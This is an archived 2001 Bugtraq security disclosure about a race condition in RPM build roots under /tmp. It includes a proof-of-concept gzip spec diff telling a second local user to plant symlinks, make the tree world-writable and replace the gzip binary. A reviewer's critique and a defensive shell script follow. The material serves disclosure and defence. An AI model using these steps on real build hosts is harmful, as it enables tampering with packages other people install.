Date: Mon, 19 Mar 2001 18:52:11 +0000 
From: Ian Lynagh <igloo@EARTH.LI>
Subject: RPM building races
To: BUGTRAQ@SECURITYFOCUS.COM

Hi all

Today it became necessary for me to build an RPM for the first time. To assist my learning I chose, randomly, gzip and had a look at its spec file in conjunction with reading the various documentation.

The first time I saw the reference to /tmp and /var/tmp I was worried, and still don't see why ./redhat isn't used in the same way as ./debian/tmp is.

Looking more closely at the spec file I saw

    rm -rf $RPM_BUILD_ROOT
    %makeinstall bindir=$RPM_BUILD_ROOT/bin gzip.info
    mkdir -p $RPM_BUILD_ROOT/usr/bin

which immediately flashed warning lights about races. In this case

    rm -rf $RPM_BUILD_ROOT
    mkdir -p `dirname $RPM_BUILD_ROOT`
    mkdir $RPM_BUILD_ROOT
    %makeinstall bindir=$RPM_BUILD_ROOT/bin gzip.info
    mkdir -p $RPM_BUILD_ROOT/usr/bin

would have been safe (I believe) as the mkdir without -p will fail if the directory exists.

This allows you to alter the files in the package, for example such that whenever anyone ran the command you got a shell SUID their UID, if you have a shell on the machine the package is built on while it is being built. Certainly in the case of gzip this is not an easy race to exploit, but it exists all the same.

I have attached a patch against gzip-1.3-6 from RedHat which pauses the build process at various points and lists commands that will build a gzip RPM in which the gzip binary simply echoes foo.

To exploit this race for real is difficult, and you need an account on the machine in question, but even so I think problems like these should be fixed. There may also be easier races in other packages.

I am not overly familiar with RPM, but I think the easiest solution would be to set the default buildroot on all packages to be something like ./rpm-building/%{package} or, slightly more work, to make sure the buildroot is secure before you do anything else in there.
I have not given vendors advance warning as their build environments are presumably secure, while it is the many sysadmins building RPMs out there on user machines who are the ones under threat. I haven't looked at other packages or RPM-based distributions at all.

Take care
Ian

Attachment: gzip.spec.diff

--- gzip.spec.orig Mon Mar 19 18:18:14 2001 +++ gzip.spec Mon Mar 19 18:37:55 2001 @@ -32,14 +32,37 @@ make gzip.info %clean +echo " +As another user, type +rm -rf $RPM_BUILD_ROOT +and press enter" +read WAIT rm -rf $RPM_BUILD_ROOT %install rm -rf $RPM_BUILD_ROOT +echo " +As another user, type +mkdir -p $RPM_BUILD_ROOT/usr/share/man/man1 +ln -s /tmp $RPM_BUILD_ROOT/usr/share/doc +mkdir $RPM_BUILD_ROOT/usr/bin +mkdir $RPM_BUILD_ROOT/bin +mkdir $RPM_BUILD_ROOT/usr/share/info +chmod -R a+rwx $RPM_BUILD_ROOT +and then press enter" +read WAIT %makeinstall bindir=$RPM_BUILD_ROOT/bin gzip.info mkdir -p $RPM_BUILD_ROOT/usr/bin ln -sf ../../bin/gzip $RPM_BUILD_ROOT/usr/bin/gzip ln -sf ../../bin/gunzip $RPM_BUILD_ROOT/usr/bin/gunzip +echo " +As another user, type +rm -f $RPM_BUILD_ROOT/bin/gzip +echo #\!/bin/sh > $RPM_BUILD_ROOT/bin/gzip +echo echo foo >> $RPM_BUILD_ROOT/bin/gzip +chmod +x $RPM_BUILD_ROOT/bin/gzip +and then press enter" +read WAIT for i in zcmp zegrep zforce zless znew gzexe zdiff zfgrep zgrep zmore ; do mv $RPM_BUILD_ROOT/bin/$i $RPM_BUILD_ROOT/usr/bin/$i
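Review bot: this hunk is a reproduction harness, not a fix, and the spec should say so in a comment at the top, because nothing in it closes the window it demonstrates: the `rm -rf $RPM_BUILD_ROOT` at the start of %install and the later `mkdir -p $RPM_BUILD_ROOT/usr/bin` are left unchanged, so the plain `mkdir $RPM_BUILD_ROOT` (no -p, failing if anything already sits at that path) that the cover note argues for never appears. The inserted `read WAIT` pauses also behave differently depending on how the build is run: with stdin at EOF (rpm driven from a script or cron) `read` returns immediately and the build continues without pausing, while in an interactive build a packager who applied this by mistake gets a spec that hangs waiting for input. Suggest either a second hunk carrying the mkdir-without-p change in %install, or guarding the pauses and stating in the spec that this diff exists only to reproduce the race and must not be packaged.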
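The mail's remedy is to replace the "rm -rf then mkdir -p" pair with a plain mkdir, so that a directory or symlink planted at the buildroot path by another local user makes the build stop rather than continue inside the planted tree. The following shell script is an added example written for this page; it is not code from Ian Lynagh's mail, from the Red Hat gzip spec, or from RPM. The function name safe_buildroot, the post-creation ownership check, and the scratch paths used in the walk-through are assumptions made for the example, not anything the mail specifies.

```shell
#!/bin/sh
# Added example (not from the mail or the gzip spec): create a build root
# with a plain mkdir so that anything already at the path, a directory or a
# symlink to /tmp, causes a hard failure instead of a silent continue.
# safe_buildroot and the demo paths are assumptions for this example.

safe_buildroot() {
    root=$1
    # The parent (e.g. /var/tmp) may legitimately exist and be shared;
    # -p is harmless here because nothing is written into the parent itself.
    mkdir -p "$(dirname "$root")" || return 1
    # Never "rm -rf $root; mkdir -p $root": between the two commands another
    # user can create $root (or a symlink from it to /tmp) and mkdir -p would
    # report success anyway. A plain mkdir fails with EEXIST on anything
    # already at that path, symlinks included.
    if ! mkdir -m 700 "$root" 2>/dev/null; then
        echo "buildroot $root already exists, refusing to build in it" >&2
        return 1
    fi
    # After-the-fact check: what sits at $root must be a real directory, not a
    # symlink, and must be owned by us. mkdir's success already implies this,
    # but the check is cheap and catches a replaced path on a sloppy system.
    if [ -L "$root" ] || [ ! -d "$root" ]; then
        echo "buildroot $root is not a plain directory" >&2
        return 1
    fi
    owner=$(ls -lnd "$root" | awk '{print $3}')   # numeric uid, portable
    if [ "$owner" != "$(id -u)" ]; then
        echo "buildroot $root is owned by uid $owner, not $(id -u)" >&2
        return 1
    fi
    return 0
}

# Walk-through on a constructed scratch tree; each case mirrors one thing
# a local user could have done to $RPM_BUILD_ROOT before %install ran.
demo() {
    base=$(mktemp -d) || return 1
    # Case 1: nothing there yet, the normal build.
    safe_buildroot "$base/gzip-root" && echo "ok: created $base/gzip-root"
    # Case 2: a directory already planted at the expected path.
    mkdir "$base/planted"
    safe_buildroot "$base/planted" || echo "ok: refused planted directory"
    # Case 3: a symlink at the expected path redirecting the install tree.
    ln -s /tmp "$base/redirect"
    safe_buildroot "$base/redirect" || echo "ok: refused symlink"
    rm -rf "$base"
}

demo
```

In a spec this would replace the `rm -rf $RPM_BUILD_ROOT` at the top of %install; if the buildroot is left over from an earlier run the build fails loudly and the packager removes it by hand, which is the behaviour the mail asks for. The ownership check uses `ls -ln` and `id -u` rather than `test -O` so that it works in any POSIX sh.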